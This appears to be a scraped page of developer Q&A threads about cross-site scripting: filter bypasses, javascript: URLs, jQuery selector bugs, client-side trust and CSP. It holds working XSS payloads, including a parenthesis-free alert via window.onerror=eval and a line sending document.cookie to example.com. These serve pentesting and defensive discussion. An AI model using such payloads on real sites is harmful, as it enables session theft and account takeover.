Javascript alert without parenthesis - javascript

I have found that Cross Site Scripting vulnerability in a client's application.
The problem is that the vulnerable parameter does not accept parenthesis. So something like alert(document.cookie) will be rejected because of parenthesis.
I can get XSS using alert xss
and I have tried the code below also failed the site reloading long time i think it's rejected
window.onerror=eval;throw '=1;alert\u0028document.location\u0029'
I tried from the link parentheses alternatives in JS , if any?
But I failed.
are there any alternatives ?
thank you

Is there a reason that an alert is necessary? I understand that it is common for demonstrating a proof of concept, but would simply having a redirect would be sufficient?
For example:
document.location="https://example.com?cookie="+document.cookie
It's important for pentesters to remember that XSS is not actually about popping alert boxes, but about executing arbitrary JavaScript. What would a real attacker do with the access your XSS allows?
Imagine setting up an identical site on a similar domain as your client's, and redirecting the user there... except now you don't need XSS and can log key strokes, ask them to download files, attempt browser exploits, etc.

Related

XSS - It is possible to sanitise user input by removing "<"?

On the front-end is it possible to catch all XSS attacks by removing < from user content? This seems a simple way to disable malicious code, and currently I have no use-cases that would require < to be preserved. Will this work in all cases?
The way I would display user content would always be as inner html, e.g.
<div>{USER CONTENT}</div>
Depends where you use the user input.
If you use it inside a a href=, then well: no!
<a href="{{linkFromUser}}">
and then that could be javascript:alert('oh no');
and a browser will execute it if the link is pressed, in the context of your page.
To clarify, the answer is in a comment of the accepted answer.
Lux kindly linked a document confirming that a similar approach of entity encoding < is enough to prevent scripts running inside inner html content (which pretty much answers my question). However & also needs to be encoded and the UTF7 XSS charset should be avoided (apparently).

Do or did javascript: URLs ever work in CSS, and if so, can it be prevented?

So I saw a code snippet today and was horrified:
<p style='background-image: url("javascript:alert(&apos;foo&apos;);");'>Hello</p>
Is it possible to execute javascript from within CSS this way? (It didn’t work when I tested it on a clean Firefox profile, but maybe I made some stupid mistake here, but the concept works.)
If so, what means are there to prevent this, either with an HTTP header or by declarations made by the HTML itself (e.g. when sourcing CSS files from another server)?
If not, was this never possible or has this changed?
The current CSS spec says only "valid image formats" can be used in a background-image:
In some cases, an image is invalid, such as a ‘<url>’ pointing to a resource that is not a valid image format. An invalid image is rendered as a solid-color ‘transparent’ image with no intrinsic dimensions. [...] If the UA cannot download, parse, or otherwise successfully display the contents at the URL as an image, it must be treated as an invalid image.
The spec is silent on whether or not a javascript: url that returns valid image data would work -- it'd be an interesting exercise to try to construct one! -- but I'd be pretty darn surprised if it did.
User agents may vary in how they handle invalid URIs or URIs that designate unavailable or inapplicable resources.
(As #Kaiido points out below, scripts within SVG will not run in this situation either, so I'd expect the whole javascript: protocol to be treated as an "inapplicable resource".)
IE supports CSS expressions:
width:expression(document.body.clientWidth > 955 ? "955px": "100%" );
but they are not standard and are not portable across browsers. Avoid them if possible. They are deprecated since IE8.
Yes, in the past this attack vector worked (older browsers like IE6). I believe most modern browsers should protect against this kind of attack. That said, there can always be more complicated attacks that may get around current protections. If you are including any user-generated content anywhere, it is best to sanitize it before injecting it into your site.
It's possible to execute JavaScript where a URI is expected by prefixing it with javascript:. This is, in fact, how bookmarklets work. I don't think however that this would work with css url(), but it does with href or window.location.
say foo
I think whoever wrote that bit of code was confused about it.

Selector interpreted as HTML on my website. Can an attacker easily exploit this?

I have a website that is only accessible via https.
It does not load any content from other sources. So all content is on the local webserver.
Using the Retire.js Chrome plugin I get a warning that the jquery 1.8.3 I included is vulnerable to 'Selector interpreted as HTML'
(jQuery bug 11290)
I am trying to motivate for a quick upgrade, but I need something more concrete information to motivate the upgrade to the powers that be.
My question are :
Given the above, should I be worried ?
Can this result in a XSS type attack ?
What the bug is telling you is that jQuery may mis-identify a selector containing a < as being an HTML fragment instead, and try to parse and create the relevant elements.
So the vulnerability, such as it is, is that a cleverly-crafted selector, if then passed into jQuery, could define a script tag that then executes arbitrary script code in the context of the page, potentially taking private information from the page and sending it to someone with malicious (or merely prurient) intent.
This is largely only useful if User A can write a selector that will later be given to jQuery in User B's session, letting User A steal information from User B's page. (It really doesn't matter if a user can "tricky" jQuery this way on their own page; they can do far worse things from the console, or with "save as".)
So: If nothing in your code lets users provide selectors that will be saved and then retrieved by other users and passed to jQuery, I wouldn't be all that worried. If it does (with or without the fix to the bug), I'd examine those selector strings really carefully. I say "with or without the bug" because if you didn't filter what the users typed at all, they could still just provide an HTML fragment where the first non-whitespace character is <, which would still cause jQuery to parse it as an HTML fragment.
As the author of Retire.js let me shed some light on this. There are two weaknesses in older versions of jQuery, but those are not vulnerabilities by themselves. It depends on how jQuery is used. Two examples abusing the bugs are shown here: research.insecurelabs.org/jquery/test/
The two examples are:
$("#<img src=x onerror=...>")
and
$("element[attribute='<img src=x onerror=...>'")
Typically this becomes a problem if you do something like:
$(location.hash)
This was a fairly common pattern for many web sites, when single page web sites started to occur.
So this becomes a problem if and only if you put untrusted user data inside the jQuery selector function.
And yes the end result is XSS, if the site is in fact vulnerable. https will not protect you against these kinds of flaws.

Degrees of JS vulnerability

Never trust the client. It's my coding mantra. All javascript can, with enough effort, be overwritten or compromised. The thing I want to understand is how.
Let's say I wrote a function checkStep() for a game - each time the player moves one space, it polls the server to check for any events: HP regeneration, enter random battle, move to next map, etc. I asked myself "self, how would I go about rewriting or disabling this function?" Research turned up some conflicting results. Some sources say functions can be directly redefined from the console, others say it would be a much more involved process.
My question is this: what would a player have to do to rewrite or disable my checkStep() function? Can they simply redefine it from the console? Would they have to rip, modify, and re-host my code? How would you do it?
Please note, I'm not asking how to make this function secure.
The first person to leave an answer/comment along the lines of "you
can try minifying it, but it still wont be secure" or "put in some
server-side checks" is getting bludgeoned with a semicolon, as an
example to the rest.
You could use a web debugging proxy like Fiddler to do this for your local machine. Programs like this allow you to intercept content you download and fiddle with it. So you could write a new version of the function, then use the program to replace it with your version when the file is downloaded from the server. Then, for your local machine, the code would run with the new function in place. The web session manipulation page on the Fiddler site has a few more details.
There is no reason to use any Javascript or browser a even.
If a normal user can use their browser to play the game then any user can use any program to communicate with the server and send it anything they want. The server is not able to know if someone is using a browser to connect to it or not.
This applies to anything. A game server doesn't know if the user is connecting to it through the official game client. Since the official game is closed source it would be easy to fall into trusting it even though it is possible to reverse engineer the protocols used and use anything to connect to the server.
Complex things like creating a malicious game client, or using a proxy to alter content before it makes it to the browser are technically valid points, however that seems like a lot of effort for something which is very simple to do.
var checkStep = function() {
... // your original function
}
// later on
checkStep = function() {
alert('foo');
}
It is perfectly valid in JavaScript to change what function a variable holds. Any function you define can be redefined on the client side. This can be done by other script files loaded by the browser which use conflicting variable names, scripts injected via XSS, or by the user bringing up the console.

Would this be a good idea against XSS?

as it isn't really popular to use Origin / X-Frame-Options http header and I don't think the new CSP in Firefox would be better (overhead, complicate, etc.) I want to make a proposal for a new JavaScript / ECMA version.
But first I publish the idea so you can say if its bad. I call it simple jsPolicy:
Everyone who uses JavaScript has placed scripts in his html head. So why don't we use them to add our policies there to control all following scripts. example:
<html>
<head>
<title>Example</title>
<script>
window.policy.inner = ["\nfunction foo(bar) {\n return bar;\n}\n", "foo(this);"];
</script>
</head>
<body>
<script>
function foo(bar) {
return bar;
}
</script>
Click Me
<script>
alert('XSS');
</script>
</body>
</html>
Now the browser compares the <scripts>.innerHTML and the onclick.value with the ones in the policy and so the last script element block is not executed (ignored).
Of course it won't be useful to double all the inline code, so we use checksums instead. example:
crc32("\nfunction foo(bar) {\n return bar;\n}\n");
results "1077388790"
And now the full example:
if (typeof window.policy != 'undefined') {
window.policy.inner = ["1077388790", "2501246156"];
window.policy.url = ["http://code.jquery.com/jquery*.js","http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"];
window.policy.relative = ["js/*.js"];
window.policy.report = ["api/xssreport.php"];
}
The browser only needs to compare if the checksum of an inline script is set in the policy.inner or if the script.src URL fits to the policy.url.
Note: The idea behind policy.relative is to allow local scripts only:
window.policy.url = false;
window.policy.relative = ["js/*.js"];
Note: policy.report should be nearly the same as done with CSP (sends blocked scripts and urls to an api):
https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-unofficial-draft-20110315.html#violation-report-syntax
Important:
The policy can't be set twice (else it throws a warning) = constant
To think about: The policy can only be set in the head (else it throws a warning)
The policy is only used to check the scripts that are part of the html source and not those that are placed on-the-fly. example:
document.write('<script src="http://code.jquery.com/jquery-1.5.2.min.js"></scr' + 'ipt>');
You don't need a policy.url definition for "http://code.jquery.com..." as the policy.inner checksum validated the complete script source. This means the source is loaded even if policy.url is set to false (yes it's still secure!). This garantuees a simple usage of the policy.
if one of the policies is missing there is no limitation. This means that an empty policy.relative results that all local files are allowed. This guarantees backward compatibility
if one of the policies is set to "false" no usage is allowed (default is true). example:
policy.inner = false;
This disallows any inline scripting
The policy only ignores disallowed scripts and throws a warning to the console (an error would stop the execution of allowed scripts and this isn't needed)
I think this would make XSS impossible and instead of CSP it would avoid persistent XSS as well (as long nobody overwrites the Policy) and it would be much easier to update.
What do you think?
EDIT:
Here is an example made in Javascript:
http://www.programmierer-forum.de/php/js-policy-against-xss.php
Of course we can't control the script execution, but it shows how it could work if a jsPolicy compatible browser would.
EDIT2:
Don't think I'm talking about coding a little javascript function to detect xss!! My jsPolicy idea has to be part of a new JavaScript engine. You can compare it to a php-setting placed into the .htaccess file. You can not change this setting in runtime. The same requirements apply to jsPolicy. You can call it a global setting.
jsPolicy in short words:
HTML parser -> send scripts to JavaScript Engine -> compare with jsPolicy -> is allowed?
A) yes, execution through JavaScript Engine
B) no, ignored and send report to webmaster
EDIT3:
Referenced to Mike's comment this would be a possible setting, too:
window.policy.eval = false;
Cross-site scripting occurs on the client-side. Your policies are defined on the client-side. See the problem?
I like Content Security Policy, and I use it on all of my projects. In fact, I am working on a JavaScript framework, which has one of its requirements "be CSP-friendly."
CSP > crossdomain.xml > your policy.
The vast majority of XSS attacks come from "trusted" sources, at least as far as the browser is concerned. They are usually the result of echo'ing user input, e.g. in a forum, and not properly escaping the input. You're never going to get an XSS from linking to jquery, and it is extremely rare that you will from any other linked source.
In the case when you are trying to do cross-domain scripting, you can't get a checksum on the remote script.
So although your idea seems fine, I don't really see a point to it.
This idea keeps getting floated and re-floated every so often... and each time security experts debunk it.
Don't mean to sound harsh, but this is not a development problem, it is a security problem. Specifically, most developers don't realize how many variants, vectors, exploits and evasion techniques there are.
As some of the other answers here mentioned, the problem is that your solution does not solve the problem, of whether or not to trust whatever arrives at the browser, since on the client side you have no way of knowing what is code, and what is data. Even your solution does not prevent this.
See e.g. this question on ITsec.SE for some of the practical issues with implementing this.
(your question is kinda a duplicate of that one, more or less... )
Btw, re CSP - check this other question on ITsec.SE.
The policy is only used to check the scripts that are part of the html source and not those that are placed on-the-fly. example:
document.write('');
You don't need a policy.url definition for "http://code.jquery.com..." as the policy.inner checksum validated the complete script source. This means the source is loaded even if policy.url is set to false (yes it's still secure!). This garantuees a simple usage of the policy.
It seems like you've given the whole game away here.
If I have code like
// Pull parameters out of query string.
var match = location.search.match(/[&?]([^&=]+)=([^&]*)/);
window[decodeURIComponent(match[1])](decodeURIComponent(match[2]));
and someone tricks a user into visiting my site with the query string ?eval=alert%28%22pwned%22%29 then they've been XSSed, and your policy has done nothing to stop it.

Categories

Resources